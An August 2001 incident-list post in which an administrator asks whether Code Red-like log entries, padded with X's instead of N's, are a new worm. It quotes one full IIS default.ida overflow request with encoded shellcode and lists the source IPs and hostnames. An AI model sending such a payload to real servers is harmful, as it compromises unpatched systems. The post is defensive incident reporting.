Is there something new in the neighborhood? I'm getting CodeRed looking thingies but with X's instead of N's. I've seen six of these in the last hour:

64.81.87.33 - - [04/Aug/2001:06:17:55 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275 "-" "-"

I'm a speakeasy customer, so it's curious that most of these are coming from Speakeasy or Covad DSL accounts. It's also curious that I got hit twice from one IP -- not behavior I remember seeing from CodeRed so far.

Name: dsl081-087-033.lax1.dsl.speakeasy.net
Address: 64.81.87.33

Name: dsl081-087-033.lax1.dsl.speakeasy.net
Address: 64.81.87.33

Name: www.sacramentochats.com
Address: 64.81.62.38

Name: dsl081-081-047.lax1.dsl.speakeasy.net
Address: 64.81.81.47

Name: h-64-105-162-178.lnoclli.covad.net
Address: 64.105.162.178

Name: dsl081-156-226.chi1.dsl.speakeasy.net
Address: 64.81.156.226

Any ideas? Is this something new, or a retread I didn't know about?

    Wayne Conrad

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]